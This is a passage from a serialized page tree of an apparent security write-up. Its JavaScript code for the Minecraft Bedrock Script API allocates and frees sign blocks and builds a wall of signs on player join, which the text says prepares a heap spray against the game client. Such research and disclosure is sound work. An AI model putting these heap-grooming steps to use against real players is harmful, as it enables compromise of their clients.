true",{"type":24,"tag":301,"props":3442,"children":3443},{"style":359},[3444],{"type":30,"value":492},{"type":24,"tag":301,"props":3446,"children":3447},{"class":303,"line":495},[3448,3452,3456],{"type":24,"tag":301,"props":3449,"children":3450},{"style":308},[3451],{"type":30,"value":482},{"type":24,"tag":301,"props":3453,"children":3454},{"style":369},[3455],{"type":30,"value":3263},{"type":24,"tag":301,"props":3457,"children":3458},{"style":359},[3459],{"type":30,"value":492},{"type":24,"tag":301,"props":3461,"children":3462},{"class":303,"line":504},[3463],{"type":24,"tag":301,"props":3464,"children":3465},{"style":359},[3466],{"type":30,"value":501},{"type":24,"tag":301,"props":3468,"children":3469},{"class":303,"line":512},[3470],{"type":24,"tag":301,"props":3471,"children":3472},{"emptyLinePlaceholder":16},[3473],{"type":30,"value":341},{"type":24,"tag":301,"props":3475,"children":3476},{"class":303,"line":592},[3477,3482,3486,3491,3495,3500],{"type":24,"tag":301,"props":3478,"children":3479},{"style":369},[3480],{"type":30,"value":3481}," console",{"type":24,"tag":301,"props":3483,"children":3484},{"style":359},[3485],{"type":30,"value":206},{"type":24,"tag":301,"props":3487,"children":3488},{"style":314},[3489],{"type":30,"value":3490},"warn",{"type":24,"tag":301,"props":3492,"children":3493},{"style":359},[3494],{"type":30,"value":362},{"type":24,"tag":301,"props":3496,"children":3497},{"style":329},[3498],{"type":30,"value":3499},"\"No more allocs\"",{"type":24,"tag":301,"props":3501,"children":3502},{"style":359},[3503],{"type":30,"value":589},{"type":24,"tag":301,"props":3505,"children":3506},{"class":303,"line":619},[3507,3511,3516],{"type":24,"tag":301,"props":3508,"children":3509},{"style":308},[3510],{"type":30,"value":680},{"type":24,"tag":301,"props":3512,"children":3513},{"style":348},[3514],{"type":30,"value":3515}," undefined",{"type":24,"tag":301,"props":3517,"children":3518},{"style":359},[3519],{"type":30,"value":492},{"type":24,"tag":301,"props":3521,"children":3522},{"class":303,"line":635},[3523],{"type":24,"tag":301,"props":3524,"children":3525},{"style":359},[3526],{"type":30,"value":698},{"type":24,"tag":301,"props":3528,"children":3529},{"class":303,"line":643},[3530],{"type":24,"tag":301,"props":3531,"children":3532},{"emptyLinePlaceholder":16},[3533],{"type":30,"value":341},{"type":24,"tag":301,"props":3535,"children":3536},{"class":303,"line":652},[3537],{"type":24,"tag":301,"props":3538,"children":3539},{"style":1062},[3540],{"type":30,"value":3541},"// Free an allocated sign in the client\n",{"type":24,"tag":301,"props":3543,"children":3544},{"class":303,"line":666},[3545,3549,3554,3558,3562],{"type":24,"tag":301,"props":3546,"children":3547},{"style":348},[3548],{"type":30,"value":3205},{"type":24,"tag":301,"props":3550,"children":3551},{"style":314},[3552],{"type":30,"value":3553}," free",{"type":24,"tag":301,"props":3555,"children":3556},{"style":359},[3557],{"type":30,"value":362},{"type":24,"tag":301,"props":3559,"children":3560},{"style":369},[3561],{"type":30,"value":3294},{"type":24,"tag":301,"props":3563,"children":3564},{"style":359},[3565],{"type":30,"value":398},{"type":24,"tag":301,"props":3567,"children":3568},{"class":303,"line":674},[3569,3573,3577,3581,3585,3589,3593,3597,3601,3605,3609,3614],{"type":24,"tag":301,"props":3570,"children":3571},{"style":308},[3572],{"type":30,"value":453},{"type":24,"tag":301,"props":3574,"children":3575},{"style":359},[3576],{"type":30,"value":873},{"type":24,"tag":301,"props":3578,"children":3579},{"style":369},[3580],{"type":30,"value":3294},{"type":24,"tag":301,"props":3582,"children":3583},{"style":385},[3584],{"type":30,"value":2460},{"type":24,"tag":301,"props":3586,"children":3587},{"style":348},[3588],{"type":30,"value":3515},{"type":24,"tag":301,"props":3590,"children":3591},{"style":385},[3592],{"type":30,"value":3308},{"type":24,"tag":301,"props":3594,"children":3595},{"style":369},[3596],{"type":30,"value":3263},{"type":24,"tag":301,"props":3598,"children":3599},{"style":359},[3600],{"type":30,"value":206},{"type":24,"tag":301,"props":3602,"children":3603},{"style":369},[3604],{"type":30,"value":3303},{"type":24,"tag":301,"props":3606,"children":3607},{"style":385},[3608],{"type":30,"value":2460},{"type":24,"tag":301,"props":3610,"children":3611},{"style":348},[3612],{"type":30,"value":3613}," false",{"type":24,"tag":301,"props":3615,"children":3616},{"style":359},[3617],{"type":30,"value":398},{"type":24,"tag":301,"props":3619,"children":3620},{"class":303,"line":692},[3621,3625],{"type":24,"tag":301,"props":3622,"children":3623},{"style":308},[3624],{"type":30,"value":482},{"type":24,"tag":301,"props":3626,"children":3627},{"style":359},[3628],{"type":30,"value":492},{"type":24,"tag":301,"props":3630,"children":3632},{"class":303,"line":3631},21,[3633],{"type":24,"tag":301,"props":3634,"children":3635},{"style":359},[3636],{"type":30,"value":501},{"type":24,"tag":301,"props":3638,"children":3640},{"class":303,"line":3639},22,[3641],{"type":24,"tag":301,"props":3642,"children":3643},{"emptyLinePlaceholder":16},[3644],{"type":30,"value":341},{"type":24,"tag":301,"props":3646,"children":3648},{"class":303,"line":3647},23,[3649,3654,3658,3662,3666,3670,3674,3679],{"type":24,"tag":301,"props":3650,"children":3651},{"style":369},[3652],{"type":30,"value":3653}," sign",{"type":24,"tag":301,"props":3655,"children":3656},{"style":359},[3657],{"type":30,"value":206},{"type":24,"tag":301,"props":3659,"children":3660},{"style":369},[3661],{"type":30,"value":3294},{"type":24,"tag":301,"props":3663,"children":3664},{"style":359},[3665],{"type":30,"value":206},{"type":24,"tag":301,"props":3667,"children":3668},{"style":314},[3669],{"type":30,"value":3377},{"type":24,"tag":301,"props":3671,"children":3672},{"style":359},[3673],{"type":30,"value":362},{"type":24,"tag":301,"props":3675,"children":3676},{"style":329},[3677],{"type":30,"value":3678},"\"\"",{"type":24,"tag":301,"props":3680,"children":3681},{"style":359},[3682],{"type":30,"value":589},{"type":24,"tag":301,"props":3684,"children":3686},{"class":303,"line":3685},24,[3687,3691,3695,3699,3703,3707],{"type":24,"tag":301,"props":3688,"children":3689},{"style":369},[3690],{"type":30,"value":3653},{"type":24,"tag":301,"props":3692,"children":3693},{"style":359},[3694],{"type":30,"value":206},{"type":24,"tag":301,"props":3696,"children":3697},{"style":369},[3698],{"type":30,"value":3303},{"type":24,"tag":301,"props":3700,"children":3701},{"style":385},[3702],{"type":30,"value":2537},{"type":24,"tag":301,"props":3704,"children":3705},{"style":348},[3706],{"type":30,"value":3613},{"type":24,"tag":301,"props":3708,"children":3709},{"style":359},[3710],{"type":30,"value":492},{"type":24,"tag":301,"props":3712,"children":3714},{"class":303,"line":3713},25,[3715],{"type":24,"tag":301,"props":3716,"children":3717},{"emptyLinePlaceholder":16},[3718],{"type":30,"value":341},{"type":24,"tag":301,"props":3720,"children":3722},{"class":303,"line":3721},26,[3723,3727,3731,3736,3740,3745],{"type":24,"tag":301,"props":3724,"children":3725},{"style":369},[3726],{"type":30,"value":3653},{"type":24,"tag":301,"props":3728,"children":3729},{"style":359},[3730],{"type":30,"value":206},{"type":24,"tag":301,"props":3732,"children":3733},{"style":369},[3734],{"type":30,"value":3735},"block",{"type":24,"tag":301,"props":3737,"children":3738},{"style":359},[3739],{"type":30,"value":206},{"type":24,"tag":301,"props":3741,"children":3742},{"style":314},[3743],{"type":30,"value":3744},"setPermutation",{"type":24,"tag":301,"props":3746,"children":3747},{"style":359},[3748],{"type":30,"value":1707},{"type":24,"tag":301,"props":3750,"children":3752},{"class":303,"line":3751},27,[3753,3758,3762,3767,3771,3776],{"type":24,"tag":301,"props":3754,"children":3755},{"style":369},[3756],{"type":30,"value":3757}," BlockPermutation",{"type":24,"tag":301,"props":3759,"children":3760},{"style":359},[3761],{"type":30,"value":206},{"type":24,"tag":301,"props":3763,"children":3764},{"style":314},[3765],{"type":30,"value":3766},"resolve",{"type":24,"tag":301,"props":3768,"children":3769},{"style":359},[3770],{"type":30,"value":362},{"type":24,"tag":301,"props":3772,"children":3773},{"style":329},[3774],{"type":30,"value":3775},"\"minecraft:air\"",{"type":24,"tag":301,"props":3777,"children":3778},{"style":359},[3779],{"type":30,"value":791},{"type":24,"tag":301,"props":3781,"children":3783},{"class":303,"line":3782},28,[3784],{"type":24,"tag":301,"props":3785,"children":3786},{"style":359},[3787],{"type":30,"value":3788}," );\n",{"type":24,"tag":301,"props":3790,"children":3792},{"class":303,"line":3791},29,[3793,3797,3801,3805,3809,3813],{"type":24,"tag":301,"props":3794,"children":3795},{"style":369},[3796],{"type":30,"value":3653},{"type":24,"tag":301,"props":3798,"children":3799},{"style":359},[3800],{"type":30,"value":206},{"type":24,"tag":301,"props":3802,"children":3803},{"style":369},[3804],{"type":30,"value":3321},{"type":24,"tag":301,"props":3806,"children":3807},{"style":385},[3808],{"type":30,"value":2537},{"type":24,"tag":301,"props":3810,"children":3811},{"style":348},[3812],{"type":30,"value":3440},{"type":24,"tag":301,"props":3814,"children":3815},{"style":359},[3816],{"type":30,"value":492},{"type":24,"tag":301,"props":3818,"children":3820},{"class":303,"line":3819},30,[3821],{"type":24,"tag":301,"props":3822,"children":3823},{"style":359},[3824],{"type":30,"value":698},{"type":24,"tag":32,"props":3826,"children":3827},{},[3828,3830,3836],{"type":30,"value":3829},"These functions will be used to perform the heap spray. Before that, we need to populate the ",{"type":24,"tag":145,"props":3831,"children":3833},{"className":3832},[],[3834],{"type":30,"value":3835},"signs",{"type":30,"value":3837}," array. For this, we generate a wall of signs when a player joins, and remove it after they leave:",{"type":24,"tag":291,"props":3839,"children":3841},{"code":3840,"language":3184,"meta":7,"className":3185,"style":7},"let signs;\n\nfunction create_wall() {\n signs = [];\n\n for (let current_y = 0; current_y \u003C WALL_HEIGHT; current_y++) {\n for (let current_x = 0; current_x \u003C WALL_WIDTH; current_x++) {\n\n [...]\n \n const sign_block = world\n .getDimension(\"overworld\")\n .getBlock(sign_location);\n sign_block.setPermutation(\n BlockPermutation.resolve(\"minecraft:wall_sign\", {\n facing_direction: 3\n }\n ));\n let sign_component = sign_block\n .getComponent(BlockComponentTypes.Sign);\n\n signs.push({\n sign: sign_component,\n allocated: false,\n block: sign_block,\n removed: false\n });\n }\n }\n}\n\nfunction remove_wall() {\n signs = [];\n \n for (let current_y = 0; current_y \u003C WALL_HEIGHT; current_y++) {\n for (let current_x = 0; current_x \u003C WALL_WIDTH; current_x++) {\n \n [...]\n \n const sign_block = await wait_for_block(\n world.getDimension(\"overworld\"),\n sign_location\n );\n sign_block.setPermutation(\n BlockPermutation.resolve(\"minecraft:air\")\n );\n\n [...]\n }\n }\n}\n\nworld.afterEvents.playerSpawn.subscribe((arg) => {\n create_wall();\n});\n\nworld.beforeEvents.playerLeave.subscribe(async (arg) => {\n remove_wall();\n});\n",[3842],{"type":24,"tag":145,"props":3843,"children":3844},{"__ignoreMap":7},[3845,3860,3867,3884,3901,3908,3972,4035,4042,4060,4068,4090,4116,4141,4161,4191,4204,4212,4220,4242,4276,4283,4305,4321,4337,4353,4366,4374,4381,4388,4395,4403,4420,4436,4444,4504,4564,4572,4588,4597,4627,4657,4666,4675,4695,4723,4731,4739,4755,4763,4771,4779,4787,4846,4860,4869,4877,4940,4953],{"type":24,"tag":301,"props":3846,"children":3847},{"class":303,"line":304},[3848,3852,3856],{"type":24,"tag":301,"props":3849,"children":3850},{"style":348},[3851],{"type":30,"value":3258},{"type":24,"tag":301,"props":3853,"children":3854},{"style":369},[3855],{"type":30,"value":3273},{"type":24,"tag":301,"props":3857,"children":3858},{"style":359},[3859],{"type":30,"value":492},{"type":24,"tag":301,"props":3861,"children":3862},{"class":303,"line":320},[3863],{"type":24,"tag":301,"props":3864,"children":3865},{"emptyLinePlaceholder":16},[3866],{"type":30,"value":341},{"type":24,"tag":301,"props":3868,"children":3869},{"class":303,"line":335},[3870,3874,3879],{"type":24,"tag":301,"props":3871,"children":3872},{"style":348},[3873],{"type":30,"value":3205},{"type":24,"tag":301,"props":3875,"children":3876},{"style":314},[3877],{"type":30,"value":3878}," create_wall",{"type":24,"tag":301,"props":3880,"children":3881},{"style":359},[3882],{"type":30,"value":3883},"() {\n",{"type":24,"tag":301,"props":3885,"children":3886},{"class":303,"line":344},[3887,3892,3896],{"type":24,"tag":301,"props":3888,"children":3889},{"style":369},[3890],{"type":30,"value":3891}," signs",{"type":24,"tag":301,"props":3893,"children":3894},{"style":385},[3895],{"type":30,"value":2537},{"type":24,"tag":301,"props":3897,"children":3898},{"style":359},[3899],{"type":30,"value":3900}," [];\n",{"type":24,"tag":301,"props":3902,"children":3903},{"class":303,"line":401},[3904],{"type":24,"tag":301,"props":3905,"children":3906},{"emptyLinePlaceholder":16},[3907],{"type":30,"value":341},{"type":24,"tag":301,"props":3909,"children":3910},{"class":303,"line":415},[3911,3915,3919,3923,3928,3932,3936,3941,3946,3951,3956,3960,3964,3968],{"type":24,"tag":301,"props":3912,"children":3913},{"style":308},[3914],{"type":30,"value":3249},{"type":24,"tag":301,"props":3916,"children":3917},{"style":359},[3918],{"type":30,"value":873},{"type":24,"tag":301,"props":3920,"children":3921},{"style":348},[3922],{"type":30,"value":3258},{"type":24,"tag":301,"props":3924,"children":3925},{"style":369},[3926],{"type":30,"value":3927}," current_y",{"type":24,"tag":301,"props":3929,"children":3930},{"style":385},[3931],{"type":30,"value":2537},{"type":24,"tag":301,"props":3933,"children":3934},{"style":466},[3935],{"type":30,"value":685},{"type":24,"tag":301,"props":3937,"children":3938},{"style":359},[3939],{"type":30,"value":3940},"; ",{"type":24,"tag":301,"props":3942,"children":3943},{"style":369},[3944],{"type":30,"value":3945},"current_y",{"type":24,"tag":301,"props":3947,"children":3948},{"style":385},[3949],{"type":30,"value":3950}," \u003C",{"type":24,"tag":301,"props":3952,"children":3953},{"style":369},[3954],{"type":30,"value":3955}," WALL_HEIGHT",{"type":24,"tag":301,"props":3957,"children":3958},{"style":359},[3959],{"type":30,"value":3940},{"type":24,"tag":301,"props":3961,"children":3962},{"style":369},[3963],{"type":30,"value":3945},{"type":24,"tag":301,"props":3965,"children":3966},{"style":385},[3967],{"type":30,"value":1859},{"type":24,"tag":301,"props":3969,"children":3970},{"style":359},[3971],{"type":30,"value":398},{"type":24,"tag":301,"props":3973,"children":3974},{"class":303,"line":439},[3975,3980,3984,3988,3993,3997,4001,4005,4010,4014,4019,4023,4027,4031],{"type":24,"tag":301,"props":3976,"children":3977},{"style":308},[3978],{"type":30,"value":3979}," for",{"type":24,"tag":301,"props":3981,"children":3982},{"style":359},[3983],{"type":30,"value":873},{"type":24,"tag":301,"props":3985,"children":3986},{"style":348},[3987],{"type":30,"value":3258},{"type":24,"tag":301,"props":3989,"children":3990},{"style":369},[3991],{"type":30,"value":3992}," current_x",{"type":24,"tag":301,"props":3994,"children":3995},{"style":385},[3996],{"type":30,"value":2537},{"type":24,"tag":301,"props":3998,"children":3999},{"style":466},[4000],{"type":30,"value":685},{"type":24,"tag":301,"props":4002,"children":4003},{"style":359},[4004],{"type":30,"value":3940},{"type":24,"tag":301,"props":4006,"children":4007},{"style":369},[4008],{"type":30,"value":4009},"current_x",{"type":24,"tag":301,"props":4011,"children":4012},{"style":385},[4013],{"type":30,"value":3950},{"type":24,"tag":301,"props":4015,"children":4016},{"style":369},[4017],{"type":30,"value":4018}," WALL_WIDTH",{"type":24,"tag":301,"props":4020,"children":4021},{"style":359},[4022],{"type":30,"value":3940},{"type":24,"tag":301,"props":4024,"children":4025},{"style":369},[4026],{"type":30,"value":4009},{"type":24,"tag":301,"props":4028,"children":4029},{"style":385},[4030],{"type":30,"value":1859},{"type":24,"tag":301,"props":4032,"children":4033},{"style":359},[4034],{"type":30,"value":398},{"type":24,"tag":301,"props":4036,"children":4037},{"class":303,"line":447},[4038],{"type":24,"tag":301,"props":4039,"children":4040},{"emptyLinePlaceholder":16},[4041],{"type":30,"value":341},{"type":24,"tag":301,"props":4043,"children":4044},{"class":303,"line":476},[4045,4050,4055],{"type":24,"tag":301,"props":4046,"children":4047},{"style":359},[4048],{"type":30,"value":4049}," [",{"type":24,"tag":301,"props":4051,"children":4052},{"style":385},[4053],{"type":30,"value":4054},"...",{"type":24,"tag":301,"props":4056,"children":4057},{"style":359},[4058],{"type":30,"value":4059},"]\n",{"type":24,"tag":301,"props":4061,"children":4062},{"class":303,"line":495},[4063],{"type":24,"tag":301,"props":4064,"children":4065},{"style":359},[4066],{"type":30,"value":4067}," \n",{"type":24,"tag":301,"props":4069,"children":4070},{"class":303,"line":504},[4071,4076,4081,4085],{"type":24,"tag":301,"props":4072,"children":4073},{"style":348},[4074],{"type":30,"value":4075}," const",{"type":24,"tag":301,"props":4077,"children":4078},{"style":369},[4079],{"type":30,"value":4080}," sign_block",{"type":24,"tag":301,"props":4082,"children":4083},{"style":385},[4084],{"type":30,"value":2537},{"type":24,"tag":301,"props":4086,"children":4087},{"style":369},[4088],{"type":30,"value":4089}," world\n",{"type":24,"tag":301,"props":4091,"children":4092},{"class":303,"line":512},[4093,4098,4103,4107,4112],{"type":24,"tag":301,"props":4094,"children":4095},{"style":359},[4096],{"type":30,"value":4097}," .",{"type":24,"tag":301,"props":4099,"children":4100},{"style":314},[4101],{"type":30,"value":4102},"getDimension",{"type":24,"tag":301,"props":4104,"children":4105},{"style":359},[4106],{"type":30,"value":362},{"type":24,"tag":301,"props":4108,"children":4109},{"style":329},[4110],{"type":30,"value":4111},"\"overworld\"",{"type":24,"tag":301,"props":4113,"children":4114},{"style":359},[4115],{"type":30,"value":791},{"type":24,"tag":301,"props":4117,"children":4118},{"class":303,"line":592},[4119,4123,4128,4132,4137],{"type":24,"tag":301,"props":4120,"children":4121},{"style":359},[4122],{"type":30,"value":4097},{"type":24,"tag":301,"props":4124,"children":4125},{"style":314},[4126],{"type":30,"value":4127},"getBlock",{"type":24,"tag":301,"props":4129,"children":4130},{"style":359},[4131],{"type":30,"value":362},{"type":24,"tag":301,"props":4133,"children":4134},{"style":369},[4135],{"type":30,"value":4136},"sign_location",{"type":24,"tag":301,"props":4138,"children":4139},{"style":359},[4140],{"type":30,"value":589},{"type":24,"tag":301,"props":4142,"children":4143},{"class":303,"line":619},[4144,4149,4153,4157],{"type":24,"tag":301,"props":4145,"children":4146},{"style":369},[4147],{"type":30,"value":4148}," sign_block",{"type":24,"tag":301,"props":4150,"children":4151},{"style":359},[4152],{"type":30,"value":206},{"type":24,"tag":301,"props":4154,"children":4155},{"style":314},[4156],{"type":30,"value":3744},{"type":24,"tag":301,"props":4158,"children":4159},{"style":359},[4160],{"type":30,"value":1707},{"type":24,"tag":301,"props":4162,"children":4163},{"class":303,"line":635},[4164,4169,4173,4177,4181,4186],{"type":24,"tag":301,"props":4165,"children":4166},{"style":369},[4167],{"type":30,"value":4168}," BlockPermutation",{"type":24,"tag":301,"props":4170,"children":4171},{"style":359},[4172],{"type":30,"value":206},{"type":24,"tag":301,"props":4174,"children":4175},{"style":314},[4176],{"type":30,"value":3766},{"type":24,"tag":301,"props":4178,"children":4179},{"style":359},[4180],{"type":30,"value":362},{"type":24,"tag":301,"props":4182,"children":4183},{"style":329},[4184],{"type":30,"value":4185},"\"minecraft:wall_sign\"",{"type":24,"tag":301,"props":4187,"children":4188},{"style":359},[4189],{"type":30,"value":4190},", {\n",{"type":24,"tag":301,"props":4192,"children":4193},{"class":303,"line":643},[4194,4199],{"type":24,"tag":301,"props":4195,"children":4196},{"style":369},[4197],{"type":30,"value":4198}," facing_direction:",{"type":24,"tag":301,"props":4200,"children":4201},{"style":466},[4202],{"type":30,"value":4203}," 3\n",{"type":24,"tag":301,"props":4205,"children":4206},{"class":303,"line":652},[4207],{"type":24,"tag":301,"props":4208,"children":4209},{"style":359},[4210],{"type":30,"value":4211}," }\n",{"type":24,"tag":301,"props":4213,"children":4214},{"class":303,"line":666},[4215],{"type":24,"tag":301,"props":4216,"children":4217},{"style":359},[4218],{"type":30,"value":4219}," ));\n",{"type":24,"tag":301,"props":4221,"children":4222},{"class":303,"line":674},[4223,4228,4233,4237],{"type":24,"tag":301,"props":4224,"children":4225},{"style":348},[4226],{"type":30,"value":4227}," let",{"type":24,"tag":301,"props":4229,"children":4230},{"style":369},[4231],{"type":30,"value":4232}," sign_component",{"type":24,"tag":301,"props":4234,"children":4235},{"style":385},[4236],{"type":30,"value":2537},{"type":24,"tag":301,"props":4238,"children":4239},{"style":369},[4240],{"type":30,"value":4241}," sign_block\n",{"type":24,"tag":301,"props":4243,"children":4244},{"class":303,"line":692},[4245,4249,4254,4258,4263,4267,4272],{"type":24,"tag":301,"props":4246,"children":4247},{"style":359},[4248],{"type":30,"value":4097},{"type":24,"tag":301,"props":4250,"children":4251},{"style":314},[4252],{"type":30,"value":4253},"getComponent",{"type":24,"tag":301,"props":4255,"children":4256},{"style":359},[4257],{"type":30,"value":362},{"type":24,"tag":301,"props":4259,"children":4260},{"style":369},[4261],{"type":30,"value":4262},"BlockComponentTypes",{"type":24,"tag":301,"props":4264,"children":4265},{"style":359},[4266],{"type":30,"value":206},{"type":24,"tag":301,"props":4268,"children":4269},{"style":369},[4270],{"type":30,"value":4271},"Sign",{"type":24,"tag":301,"props":4273,"children":4274},{"style":359},[4275],{"type":30,"value":589},{"type":24,"tag":301,"props":4277,"children":4278},{"class":303,"line":3631},[4279],{"type":24,"tag":301,"props":4280,"children":4281},{"emptyLinePlaceholder":16},[4282],{"type":30,"value":341},{"type":24,"tag":301,"props":4284,"children":4285},{"class":303,"line":3639},[4286,4291,4295,4300],{"type":24,"tag":301,"props":4287,"children":4288},{"style":369},[4289],{"type":30,"value":4290}," signs",{"type":24,"tag":301,"props":4292,"children":4293},{"style":359},[4294],{"type":30,"value":206},{"type":24,"tag":301,"props":4296,"children":4297},{"style":314},[4298],{"type":30,"value":4299},"push",{"type":24,"tag":301,"props":4301,"children":4302},{"style":359},[4303],{"type":30,"value":4304},"({\n",{"type":24,"tag":301,"props":4306,"children":4307},{"class":303,"line":3647},[4308,4313,4317],{"type":24,"tag":301,"props":4309,"children":4310},{"style":369},[4311],{"type":30,"value":4312}," sign:",{"type":24,"tag":301,"props":4314,"children":4315},{"style":369},[4316],{"type":30,"value":4232},{"type":24,"tag":301,"props":4318,"children":4319},{"style":359},[4320],{"type":30,"value":1729},{"type":24,"tag":301,"props":4322,"children":4323},{"class":303,"line":3685},[4324,4329,4333],{"type":24,"tag":301,"props":4325,"children":4326},{"style":369},[4327],{"type":30,"value":4328}," allocated:",{"type":24,"tag":301,"props":4330,"children":4331},{"style":348},[4332],{"type":30,"value":3613},{"type":24,"tag":301,"props":4334,"children":4335},{"style":359},[4336],{"type":30,"value":1729},{"type":24,"tag":301,"props":4338,"children":4339},{"class":303,"line":3713},[4340,4345,4349],{"type":24,"tag":301,"props":4341,"children":4342},{"style":369},[4343],{"type":30,"value":4344}," block:",{"type":24,"tag":301,"props":4346,"children":4347},{"style":369},[4348],{"type":30,"value":4080},{"type":24,"tag":301,"props":4350,"children":4351},{"style":359},[4352],{"type":30,"value":1729},{"type":24,"tag":301,"props":4354,"children":4355},{"class":303,"line":3721},[4356,4361],{"type":24,"tag":301,"props":4357,"children":4358},{"style":369},[4359],{"type":30,"value":4360}," removed:",{"type":24,"tag":301,"props":4362,"children":4363},{"style":348},[4364],{"type":30,"value":4365}," false\n",{"type":24,"tag":301,"props":4367,"children":4368},{"class":303,"line":3751},[4369],{"type":24,"tag":301,"props":4370,"children":4371},{"style":359},[4372],{"type":30,"value":4373}," });\n",{"type":24,"tag":301,"props":4375,"children":4376},{"class":303,"line":3782},[4377],{"type":24,"tag":301,"props":4378,"children":4379},{"style":359},[4380],{"type":30,"value":3345},{"type":24,"tag":301,"props":4382,"children":4383},{"class":303,"line":3791},[4384],{"type":24,"tag":301,"props":4385,"children":4386},{"style":359},[4387],{"type":30,"value":501},{"type":24,"tag":301,"props":4389,"children":4390},{"class":303,"line":3819},[4391],{"type":24,"tag":301,"props":4392,"children":4393},{"style":359},[4394],{"type":30,"value":698},{"type":24,"tag":301,"props":4396,"children":4398},{"class":303,"line":4397},31,[4399],{"type":24,"tag":301,"props":4400,"children":4401},{"emptyLinePlaceholder":16},[4402],{"type":30,"value":341},{"type":24,"tag":301,"props":4404,"children":4406},{"class":303,"line":4405},32,[4407,4411,4416],{"type":24,"tag":301,"props":4408,"children":4409},{"style":348},[4410],{"type":30,"value":3205},{"type":24,"tag":301,"props":4412,"children":4413},{"style":314},[4414],{"type":30,"value":4415}," remove_wall",{"type":24,"tag":301,"props":4417,"children":4418},{"style":359},[4419],{"type":30,"value":3883},{"type":24,"tag":301,"props":4421,"children":4423},{"class":303,"line":4422},33,[4424,4428,4432],{"type":24,"tag":301,"props":4425,"children":4426},{"style":369},[4427],{"type":30,"value":3891},{"type":24,"tag":301,"props":4429,"children":4430},{"style":385},[4431],{"type":30,"value":2537},{"type":24,"tag":301,"props":4433,"children":4434},{"style":359},[4435],{"type":30,"value":3900},{"type":24,"tag":301,"props":4437,"children":4439},{"class":303,"line":4438},34,[4440],{"type":24,"tag":301,"props":4441,"children":4442},{"style":359},[4443],{"type":30,"value":649},{"type":24,"tag":301,"props":4445,"children":4447},{"class":303,"line":4446},35,[4448,4452,4456,4460,4464,4468,4472,4476,4480,4484,4488,4492,4496,4500],{"type":24,"tag":301,"props":4449,"children":4450},{"style":308},[4451],{"type":30,"value":3249},{"type":24,"tag":301,"props":4453,"children":4454},{"style":359},[4455],{"type":30,"value":873},{"type":24,"tag":301,"props":4457,"children":4458},{"style":348},[4459],{"type":30,"value":3258},{"type":24,"tag":301,"props":4461,"children":4462},{"style":369},[4463],{"type":30,"value":3927},{"type":24,"tag":301,"props":4465,"children":4466},{"style":385},[4467],{"type":30,"value":2537},{"type":24,"tag":301,"props":4469,"children":4470},{"style":466},[4471],{"type":30,"value":685},{"type":24,"tag":301,"props":4473,"children":4474},{"style":359},[4475],{"type":30,"value":3940},{"type":24,"tag":301,"props":4477,"children":4478},{"style":369},[4479],{"type":30,"value":3945},{"type":24,"tag":301,"props":4481,"children":4482},{"style":385},[4483],{"type":30,"value":3950},{"type":24,"tag":301,"props":4485,"children":4486},{"style":369},[4487],{"type":30,"value":3955},{"type":24,"tag":301,"props":4489,"children":4490},{"style":359},[4491],{"type":30,"value":3940},{"type":24,"tag":301,"props":4493,"children":4494},{"style":369},[4495],{"type":30,"value":3945},{"type":24,"tag":301,"props":4497,"children":4498},{"style":385},[4499],{"type":30,"value":1859},{"type":24,"tag":301,"props":4501,"children":4502},{"style":359},[4503],{"type":30,"value":398},{"type":24,"tag":301,"props":4505,"children":4507},{"class":303,"line":4506},36,[4508,4512,4516,4520,4524,4528,4532,4536,4540,4544,4548,4552,4556,4560],{"type":24,"tag":301,"props":4509,"children":4510},{"style":308},[4511],{"type":30,"value":3979},{"type":24,"tag":301,"props":4513,"children":4514},{"style":359},[4515],{"type":30,"value":873},{"type":24,"tag":301,"props":4517,"children":4518},{"style":348},[4519],{"type":30,"value":3258},{"type":24,"tag":301,"props":4521,"children":4522},{"style":369},[4523],{"type":30,"value":3992},{"type":24,"tag":301,"props":4525,"children":4526},{"style":385},[4527],{"type":30,"value":2537},{"type":24,"tag":301,"props":4529,"children":4530},{"style":466},[4531],{"type":30,"value":685},{"type":24,"tag":301,"props":4533,"children":4534},{"style":359},[4535],{"type":30,"value":3940},{"type":24,"tag":301,"props":4537,"children":4538},{"style":369},[4539],{"type":30,"value":4009},{"type":24,"tag":301,"props":4541,"children":4542},{"style":385},[4543],{"type":30,"value":3950},{"type":24,"tag":301,"props":4545,"children":4546},{"style":369},[4547],{"type":30,"value":4018},{"type":24,"tag":301,"props":4549,"children":4550},{"style":359},[4551],{"type":30,"value":3940},{"type":24,"tag":301,"props":4553,"children":4554},{"style":369},[4555],{"type":30,"value":4009},{"type":24,"tag":301,"props":4557,"children":4558},{"style":385},[4559],{"type":30,"value":1859},{"type":24,"tag":301,"props":4561,"children":4562},{"style":359},[4563],{"type":30,"value":398},{"type":24,"tag":301,"props":4565,"children":4567},{"class":303,"line":4566},37,[4568],{"type":24,"tag":301,"props":4569,"children":4570},{"style":359},[4571],{"type":30,"value":4067},{"type":24,"tag":301,"props":4573,"children":4575},{"class":303,"line":4574},38,[4576,4580,4584],{"type":24,"tag":301,"props":4577,"children":4578},{"style":359},[4579],{"type":30,"value":4049},{"type":24,"tag":301,"props":4581,"children":4582},{"style":385},[4583],{"type":30,"value":4054},{"type":24,"tag":301,"props":4585,"children":4586},{"style":359},[4587],{"type":30,"value":4059},{"type":24,"tag":301,"props":4589,"children":4591},{"class":303,"line":4590},39,[4592],{"type":24,"tag":301,"props":4593,"children":4594},{"style":359},[4595],{"type":30,"value":4596}," \n",{"type":24,"tag":301,"props":4598,"children":4600},{"class":303,"line":4599},40,[4601,4605,4609,4613,4618,4623],{"type":24,"tag":301,"props":4602,"children":4603},{"style":348},[4604],{"type":30,"value":4075},{"type":24,"tag":301,"props":4606,"children":4607},{"style":369},[4608],{"type":30,"value":4080},{"type":24,"tag":301,"props":4610,"children":4611},{"style":385},[4612],{"type":30,"value":2537},{"type":24,"tag":301,"props":4614,"children":4615},{"style":308},[4616],{"type":30,"value":4617}," await",{"type":24,"tag":301,"props":4619,"children":4620},{"style":314},[4621],{"type":30,"value":4622}," wait_for_block",{"type":24,"tag":301,"props":4624,"children":4625},{"style":359},[4626],{"type":30,"value":1707},{"type":24,"tag":301,"props":4628,"children":4630},{"class":303,"line":4629},41,[4631,4636,4640,4644,4648,4652],{"type":24,"tag":301,"props":4632,"children":4633},{"style":369},[4634],{"type":30,"value":4635}," 